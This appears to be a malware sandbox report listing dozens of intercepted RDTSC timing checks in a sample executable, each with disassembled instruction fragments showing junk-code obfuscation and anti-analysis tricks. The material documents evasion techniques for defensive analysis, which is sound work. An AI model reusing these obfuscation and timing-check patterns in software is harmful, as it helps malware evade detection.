                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0299E second address: A029F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FC8BCD07016h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jng 00007FC8BCD07022h 0x00000015 nop 0x00000016 xor di, 9326h 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+12478414h], ebx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FC8BCD07018h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov edi, ebx 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A029F9 second address: A02A03 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A02A03 second address: A02A0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A02BAF second address: A02BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A01ADC second address: A01AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC8BCD07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A02BB4 second address: A02BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A05AE0 second address: A05AF2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A01AE6 second address: A01B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FC8BCFEEF08h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 call 00007FC8BCFEEF10h 0x0000002a push ecx 0x0000002b sub dword ptr [ebp+122D1E95h], ecx 0x00000031 pop ebx 0x00000032 pop edi 0x00000033 push dword ptr fs:[00000000h] 0x0000003a jbe 00007FC8BCFEEF0Bh 0x00000040 add di, E3BBh 0x00000045 mov dword ptr [ebp+122D2F23h], ebx 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 cld 0x00000053 mov ebx, dword ptr [ebp+122D314Dh] 0x00000059 mov eax, dword ptr [ebp+122D0081h] 0x0000005f mov ebx, 09725B62h 0x00000064 push FFFFFFFFh 0x00000066 jo 00007FC8BCFEEF12h 0x0000006c jns 00007FC8BCFEEF0Ch 0x00000072 sub edi, 0EFAF955h 0x00000078 nop 0x00000079 push edi 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A05AF2 second address: A05AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A05AF8 second address: A05B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007FC8BCFEEF06h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC8BCFEEF08h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 movzx edi, cx 0x0000002a or dword ptr [ebp+122D3810h], edx 0x00000030 push 00000000h 0x00000032 movzx ebx, ax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FC8BCFEEF08h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov ebx, 5C2E6F27h 0x00000056 xchg eax, esi 0x00000057 push ebx 0x00000058 jmp 00007FC8BCFEEF13h 0x0000005d pop ebx 0x0000005e push eax 0x0000005f pushad 0x00000060 jmp 00007FC8BCFEEF19h 0x00000065 jbe 00007FC8BCFEEF0Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A04C21 second address: A04C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A06A6C second address: A06ACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FC8BCFEEF08h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov di, dx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FC8BCFEEF08h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D1ED5h], ebx 0x00000049 xchg eax, esi 0x0000004a jmp 00007FC8BCFEEF0Dh 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push edi 0x00000054 pop edi 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A07B8B second address: A07B9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FC8BCD07018h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A07C91 second address: A07C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A07C95 second address: A07C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A08AFD second address: A08B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0AB1F second address: A0AB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC8BCD07023h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0E609 second address: A0E60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0E60D second address: A0E613 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0E613 second address: A0E619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A12B8F second address: A12B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC8BCD07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1247E second address: A1248E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1248E second address: A12492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A125D2 second address: A125DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A125DC second address: A125EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD0701Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A17984 second address: A179E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jne 00007FC8BCFEEF18h 0x00000012 jns 00007FC8BCFEEF10h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jc 00007FC8BCFEEF0Eh 0x00000023 jg 00007FC8BCFEEF08h 0x00000029 mov eax, dword ptr [eax] 0x0000002b push edx 0x0000002c jnc 00007FC8BCFEEF0Ch 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push ecx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1D780 second address: A1D786 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1D786 second address: A1D7BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007FC8BCFEEF1Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1D7BE second address: A1D7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1D7C2 second address: A1D7E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC8BCFEEF18h 0x0000000d jng 00007FC8BCFEEF06h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1DBC8 second address: A1DBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1DBCC second address: A1DBE9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC8BCFEEF13h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A1E05A second address: A1E08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC8BCD07016h 0x0000000a js 00007FC8BCD07023h 0x00000010 jmp 00007FC8BCD0701Dh 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FC8BCD0701Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A218FE second address: A21927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FC8BCFEEF3Bh 0x0000000d pushad 0x0000000e jmp 00007FC8BCFEEF19h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A2729A second address: A2729E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A25E27 second address: A25E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A25E34 second address: A25E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A25E38 second address: A25E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FC8BCFEEF19h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A25E61 second address: A25E66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A265F9 second address: A2661A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FC8BCFEEF19h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A2661A second address: A26636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07027h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A267BD second address: A267D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Eh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A267D1 second address: A267D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A2A456 second address: A2A45B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A2D3D6 second address: A2D3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 99E35F second address: 99E36B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC8BCFEEF06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A32BBD second address: A32BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A31B48 second address: A31B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Bh 0x00000007 jns 00007FC8BCFEEF0Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC8BCFEEF0Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A31B75 second address: A31B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A31B79 second address: A31B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A32295 second address: A322A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC8BCD0701Ah 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A322A4 second address: A322AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A323E1 second address: A323F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8BCD0701Dh 0x00000008 jg 00007FC8BCD07016h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A323F9 second address: A32405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A32405 second address: A3240B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A3240B second address: A32410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A32556 second address: A32570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07025h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A32570 second address: A32575 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A32575 second address: A325BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC8BCD07016h 0x0000000a pop ebx 0x0000000b jo 00007FC8BCD07022h 0x00000011 jc 00007FC8BCD07016h 0x00000017 jc 00007FC8BCD07016h 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007FC8BCD07039h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A325BF second address: A325C9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8BCFEEF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A35FCF second address: A35FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07028h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC8BCD0701Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E9ACB second address: 9D19AB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCFEEF0Ch 0x00000008 jnp 00007FC8BCFEEF06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3877h], edx 0x00000017 mov dl, 1Ah 0x00000019 lea eax, dword ptr [ebp+124857EDh] 0x0000001f mov dword ptr [ebp+122D2600h], eax 0x00000025 push eax 0x00000026 jmp 00007FC8BCFEEF11h 0x0000002b mov dword ptr [esp], eax 0x0000002e mov edx, esi 0x00000030 call dword ptr [ebp+12455F97h] 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E9BE1 second address: 9E9BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9E9FCB second address: 837D6A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCFEEF15h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push dword ptr [ebp+122D098Dh] 0x00000011 mov ecx, dword ptr [ebp+122D3A22h] 0x00000017 call dword ptr [ebp+122D2CC2h] 0x0000001d pushad 0x0000001e jne 00007FC8BCFEEF2Bh 0x00000024 xor eax, eax 0x00000026 pushad 0x00000027 mov eax, dword ptr [ebp+122D3A82h] 0x0000002d jg 00007FC8BCFEEF0Bh 0x00000033 sub dx, 13D1h 0x00000038 popad 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d pushad 0x0000003e mov ax, si 0x00000041 movzx esi, cx 0x00000044 popad 0x00000045 jmp 00007FC8BCFEEF12h 0x0000004a mov dword ptr [ebp+122D3BE2h], eax 0x00000050 cmc 0x00000051 pushad 0x00000052 mov esi, ecx 0x00000054 mov dword ptr [ebp+122D3070h], eax 0x0000005a popad 0x0000005b mov esi, 0000003Ch 0x00000060 jg 00007FC8BCFEEF0Dh 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a sub dword ptr [ebp+122D20B9h], ebx 0x00000070 lodsw 0x00000072 sub dword ptr [ebp+122D2034h], ebx 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c jmp 00007FC8BCFEEF14h 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D1C62h], esi 0x0000008b push eax 0x0000008c jnp 00007FC8BCFEEF14h 0x00000092 push eax 0x00000093 push edx 0x00000094 pushad 0x00000095 popad 0x00000096 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA05A second address: 9EA05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA05E second address: 9EA0A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FC8BCFEEF06h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 jno 00007FC8BCFEEF1Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007FC8BCFEEF06h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA173 second address: 9EA177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA278 second address: 9EA27D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA343 second address: 9EA371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp], esi 0x0000000b ja 00007FC8BCD07022h 0x00000011 add dword ptr [ebp+124675D2h], edi 0x00000017 nop 0x00000018 push ebx 0x00000019 pushad 0x0000001a jng 00007FC8BCD07016h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA371 second address: 9EA382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FC8BCFEEF08h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA382 second address: 9EA388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA49E second address: 9EA4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA4A2 second address: 9EA4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EA587 second address: 9EA591 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8BCFEEF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAA34 second address: 9EAA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAA38 second address: 9EAA48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
